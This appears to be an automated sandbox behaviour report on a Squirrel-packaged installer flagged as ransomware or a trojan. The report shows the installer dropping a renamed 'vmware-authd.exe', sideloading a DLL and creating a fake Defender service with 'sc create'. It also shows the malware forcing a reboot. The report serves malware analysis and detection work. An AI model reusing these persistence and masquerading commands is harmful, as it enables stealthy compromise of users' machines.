Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: msctfui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: uiautomationcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: vmwarebase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: vmwarebase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	Section loaded: shutdownext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	Section loaded: sspicli.dll	Jump to behavior

Source: 0923840932020004-3-0.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: MpRtp.dll.8.dr	Binary string: \\?\UNC\\\.\\\\\?\\Device\Mup\tsclient\HashDigestLengthObjectLengthS:P(TL;CIOI;0x%lx;;;%s)S:S-1-19-512-1536S-1-1-0
Source: MpRtp.dll.8.dr	Binary string: uxX\Device\SftVol\\Device\MountPointManagerFile ID\\%s
Source: MpRtp.dll.8.dr	Binary string: =6b\DEVICEfile\\.\transactionfilebootsamplefileexpensivesamplefilerequested%lu->%ld / %ld%c%ldremote%ld%cfixedremovable%ws / %wsnot boot%SystemDrive%Passthrough\SystemRoot\\Device\AUDIT{5737d832-9e2c-4922-9623-48a220290dcb}FolderGuardTargetPathFolderGuardTargetDiskFolderGuardId7m
Source: MpCmdRun.exe0.8.dr	Binary string: kernelbase.dllRaiseFailFastException%wswilstd::exception: %hsonecore\internal\sdk\inc\wil\opensource\wil\resource.h_p0WilError_03Bad optional accessamcore\antimalware\source\service\tools\mpcmdtool\mpperformancereport.cppProcessIdReasonPID\\?\\Device\\drivers\\FI_UNKNOWNerror: invalid data: System path changed during the trace from "%ls" to "%ls"
Source: MpSvc.dll.8.dr	Binary string: 8\Device\Mup
Source: MpRtp.dll.8.dr	Binary string: C:\Device\Mup
Source: MpRtp.dll.8.dr	Binary string: \??\Volume\Device\LanmanRedirector\\Device\Harddisk\Device\CdRom\Device\Floppy\Device\WinDfs\\Device\RdpDr\\Device\WebDavRedirector\\Device\Mup\GetVolumePathNamesForVolumeNameW*?%ws%ws[Exclusion] %ls is discarded due to error %#lx best\Device\LanmanRedirector

Source: DefMeta-1.0.0-full.nupkg

Binary or memory string: y.vBP

Source: classification engine

Classification label: mal80.rans.troj.evad.winEXE@19/76@1/1

Source: C:\Users\user\Desktop\0923840932020004-3-0.exe

Code function: 0_2_00F9653A __EH_prolog3_GS,IUnknown_QueryInterface_Proxy,SysFreeString,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysAllocString,GetFileAttributesW,GetTempFileNameW,DeleteFileW,PathIsUNCW,CreateDirectoryW,GetLastError,FreeResource,

0_2_00F9653A

Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe

Code function: 4_2_00485C70 Warning,Warning,GetLastError,Warning,Warning,Warning,GetLastError,Warning,Warning,StartServiceW,GetLastError,Warning,GetTickCount,QueryServiceStatus,GetTickCount,GetTickCount,Sleep,QueryServiceStatus,GetLastError,Warning,Warning,Warning,

4_2_00485C70

Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe

Code function: 4_2_00485EE0 Warning,Warning,strrchr,memset,GetModuleFileNameW,GetLastError,WSCSetApplicationCategory,WSCSetApplicationCategory,Warning,Warning,WSAStartup,WSAGetLastError,Warning,StartServiceCtrlDispatcherW,GetLastError,

4_2_00485EE0

Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe

File created: C:\Program Files (x86)\Microsoft.NET\binc.zip

Jump to behavior

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe

File created: C:\Users\user\AppData\Local\DefMeta

Jump to behavior

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7320:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4080:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7216:120:WilError_03

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe

File created: C:\Users\user\AppData\Local\Temp\.squirrel-lock-0A9DF309FA4FA75EAD220B9627261645FFAC905C

Jump to behavior

Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Command line argument: kernel32.dll		0_2_00F97326
Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Command line argument: --checkInstall		0_2_00F97326

Source: 0923840932020004-3-0.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\0923840932020004-3-0.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 0923840932020004-3-0.exe

Virustotal: Detection: 9%

Source: 0923840932020004-3-0.exe	String found in binary or memory: "%s" --install . %s
Source: 0923840932020004-3-0.exe	String found in binary or memory: DeploymentTool.exe\need dictionaryinvalid literal/length codeinvalid distance codeinvalid block typeinvalid stored block lengthstoo many length or distance symbolsinvalid bit length repeatoversubscribed dynamic bit lengths treeincomplete dynamic bit lengths treeoversubscribed literal/length treeincomplete literal/length treeoversubscribed distance treeincomplete distance treeempty distance tree with lengthsunknown compression methodinvalid window sizeincorrect header checkincorrect data check\..\\..//..//..\UT%s%s%s%s%sOpen Setup LogCloseInstallation has failedSquirrelSQUIRREL_TEMP%s%s\%sUnable to write to %s - IT policies may be restricting access to this folder\SquirrelTemp%s\SquirrelSetup.logDATAUpdate.exe"%s" --install . %sThere was an error while installing the application. Check the setup log for more information and contact the author.Failed to extract installervector<T> too longi
Source: Update.exe	String found in binary or memory: b=\|baseUrl={Provides a base URL to prefix the RELEASES file packages with-a=\|process-start-args=iArguments that will be used when starting executable-l=\|shortcut-locations=
Source: Update.exe	String found in binary or memory: ((?=^[ ]{{0,{0}}}[^ \t\n])\|\Z) # Lookahead for non-space at line-start, or end of doc
Source: Update.exe	String found in binary or memory: onError%Downloading file: 1Failed downloading URL: #Downloading url: 1Failed to download url: !squirrel-install3Starting automatic update7Failed to check for updates5Failed to download updates/Failed to apply updates9Failed to set up uninstaller){0} {1}{2} {3} # {4}
Source: Update.exe	String found in binary or memory: Scanning {0}mIgnoring {0} as the target framework is not compatible%Writing {0} to {1}UCouldn't find file for package in {1}: {0}%--squirrel-install%--squirrel-updated'--squirrel-obsolete)--squirrel-uninstall'--squirrel-firstrunAFailed to handle Squirrel events[\StringFileInfo\040904B0\SquirrelAwareVersion)SquirrelAwareVersion;Failed to promote Tray icon:
Source: Update.exe	String found in binary or memory: ..\Update.exegUpdate.exe not found, not a Squirrel-installed app?
Source: Update.exe	String found in binary or memory: update.MNo release to install, running the appIFailed to install package to app dirIFailed to update local releases file;Failed to invoke post-install;Starting fixPinnedExecutables)Fixing up tray icons
Source: Update.exe	String found in binary or memory: -delta.nupkg$iCannot apply combinations of delta and full packagesQCouldn't run Squirrel hook, continuing: ---squirrel-updated {0}---squirrel-install {0}9Squirrel Enabled Apps: [{0}]wNo apps are marked as Squirrel-aware! Going to run them all-Failed to delete key: /--squirrel-obsolete {0}7Couldn't delete directory: QCoudln't run Squirrel hook, continuing: WcleanDeadVersions: checking for version {0}kcleanDeadVersions: exclude current version folder {0}ccleanDeadVersions: exclude new version folder {0}

Source: unknown	Process created: C:\Users\user\Desktop\0923840932020004-3-0.exe C:\Users\user\Desktop\0923840932020004-3-0.exe
Source: unknown	Process created: C:\Users\user\Desktop\0923840932020004-3-0.exe "C:\Users\user\Desktop\0923840932020004-3-0.exe" --rerunningWithoutUAC
Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Process created: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe "C:\Users\user\AppData\Local\SquirrelTemp\Update.exe" --install . --rerunningWithoutUAC
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process created: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe "C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe" --squirrel-firstrun
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Process created: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe "C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe"
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C sc create WdCmdSvc binPath= "C:\\Program Files (x86)\\Microsoft.NET\\MpCmdRun.exe" start= auto
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc create WdCmdSvc binPath= "C:\\Program Files (x86)\\Microsoft.NET\\MpCmdRun.exe" start= auto
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C shutdown.exe -r -t 1 -f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\shutdown.exe shutdown.exe -r -t 1 -f
Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Process created: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe "C:\Users\user\AppData\Local\SquirrelTemp\Update.exe" --install . --rerunningWithoutUAC	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process created: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe "C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe" --squirrel-firstrun	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C sc create WdCmdSvc binPath= "C:\\Program Files (x86)\\Microsoft.NET\\MpCmdRun.exe" start= auto	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C shutdown.exe -r -t 1 -f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc create WdCmdSvc binPath= "C:\\Program Files (x86)\\Microsoft.NET\\MpCmdRun.exe" start= auto	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\shutdown.exe shutdown.exe -r -t 1 -f	Jump to behavior

Source: C:\Users\user\Desktop\0923840932020004-3-0.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32

Jump to behavior

Source: VMware Workstation.lnk.3.dr	LNK file: ..\AppData\Local\DefMeta\vmware-authd.exe
Source: VMware Workstation.lnk0.3.dr	LNK file: ..\..\..\..\..\..\Local\DefMeta\vmware-authd.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DefMeta

Jump to behavior

Source: 0923840932020004-3-0.exe

Static file information: File size 1294336 > 1048576

Source: 0923840932020004-3-0.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x111200

Source: 0923840932020004-3-0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 0923840932020004-3-0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 0923840932020004-3-0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 0923840932020004-3-0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 0923840932020004-3-0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 0923840932020004-3-0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 0923840932020004-3-0.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: 0923840932020004-3-0.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\a\_work\1\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Update.exe, 00000003.00000002.2062592570.000000000308A000.00000004.00000800.00020000.00000000.sdmp, vmware-authd.exe, vmware-authd.exe, 00000004.00000002.3264350759.000000006E3B1000.00000020.00000001.01000000.00000009.sdmp, vmware-authd.exe, 00000008.00000002.3264638959.000000006E3B1000.00000020.00000001.01000000.00000009.sdmp, vcruntime140.dll.3.dr
Source:	Binary string: MpSvc.pdbGCTL source: MpSvc.dll.8.dr
Source:	Binary string: OfflineScannerShell.pdb source: OfflineScannerShell.exe.8.dr
Source:	Binary string: NisSrv.pdb source: NisSrv.exe.8.dr
Source:	Binary string: MpAzSubmit.pdb source: MpAzSubmit.dll.8.dr
Source:	Binary string: MpCmdRun.pdbGCTL source: MpCmdRun.exe0.8.dr, MpCmdRun.exe.8.dr
Source:	Binary string: netstandard.pdb.mdb source: Update.exe
Source:	Binary string: MpRTP.pdb source: MpRtp.dll.8.dr
Source:	Binary string: MpRTP.pdbGCTL source: MpRtp.dll.8.dr
Source:	Binary string: MpDetoursCopyAccelerator.pdb source: MpDetoursCopyAccelerator.dll.8.dr
Source:	Binary string: endpointdlp.pdb source: endpointdlp.dll.8.dr
Source:	Binary string: DefenderCSP.pdb source: vmware-authd.exe, 00000008.00000003.2107824020.0000000005831000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpCmdRun.pdb source: MpCmdRun.exe0.8.dr, MpCmdRun.exe.8.dr
Source:	Binary string: MpCopyAccelerator.pdbGCTL source: MpCopyAccelerator.exe.8.dr
Source:	Binary string: shellext.pdb source: shellext.dll.8.dr
Source:	Binary string: endpointdlp.pdbGCTL source: endpointdlp.dll.8.dr
Source:	Binary string: MpDlpCmd.pdbGCTL source: MpDlpCmd.exe.8.dr
Source:	Binary string: D:\build\ob\bora-20800274\bora\build\build\authd\release\win32\vmware-authd.pdb-- source: Update.exe, 00000003.00000002.2062592570.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, vmware-authd.exe, 00000004.00000002.3262907385.000000000048A000.00000002.00000001.01000000.00000008.sdmp, vmware-authd.exe, 00000004.00000000.2041997079.000000000048A000.00000002.00000001.01000000.00000008.sdmp, vmware-authd.exe, 00000008.00000000.2055780401.000000000048A000.00000002.00000001.01000000.00000008.sdmp, vmware-authd.exe, 00000008.00000002.3262746812.000000000048A000.00000002.00000001.01000000.00000008.sdmp, vmware-authd.exe.3.dr
Source:	Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\Setup.pdb source: 0923840932020004-3-0.exe
Source:	Binary string: MsMpCom.pdb source: MsMpCom.dll.8.dr
Source:	Binary string: MpDetours.pdb source: MpDetours.dll.8.dr
Source:	Binary string: MpAzSubmit.pdbGCTL source: MpAzSubmit.dll.8.dr
Source:	Binary string: C:\Users\DeveloperSys\Documents\Embarcadero\Studio\Projects\DLL New Completa\Projeto C++\Novas DLLs\Dll2\Release\PanelMain.pdba source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E11A000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E11A000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr
Source:	Binary string: MpDetours.pdbGCTL source: MpDetours.dll.8.dr
Source:	Binary string: ProtectionManagement.pdbGCTL source: ProtectionManagement.dll.8.dr
Source:	Binary string: MpCommu.pdb source: MpCommu.dll.8.dr
Source:	Binary string: MpCommu.pdbGCTL source: MpCommu.dll.8.dr
Source:	Binary string: MpDetoursCopyAccelerator.pdbGCTL source: MpDetoursCopyAccelerator.dll.8.dr
Source:	Binary string: shellext.pdbOGPS source: shellext.dll.8.dr
Source:	Binary string: ProtectionManagement.pdb source: ProtectionManagement.dll.8.dr
Source:	Binary string: NisSrv.pdbGCTL source: NisSrv.exe.8.dr
Source:	Binary string: MpDlpCmd.pdb source: MpDlpCmd.exe.8.dr
Source:	Binary string: MpCopyAccelerator.pdb source: MpCopyAccelerator.exe.8.dr
Source:	Binary string: OfflineScannerShell.pdbOGPS source: OfflineScannerShell.exe.8.dr
Source:	Binary string: DefenderCSP.pdbGCTL source: vmware-authd.exe, 00000008.00000003.2107824020.0000000005831000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\DeveloperSys\Documents\Embarcadero\Studio\Projects\DLL New Completa\Projeto C++\Novas DLLs\Dll2\Release\PanelMain.pdb source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E11A000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E11A000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr
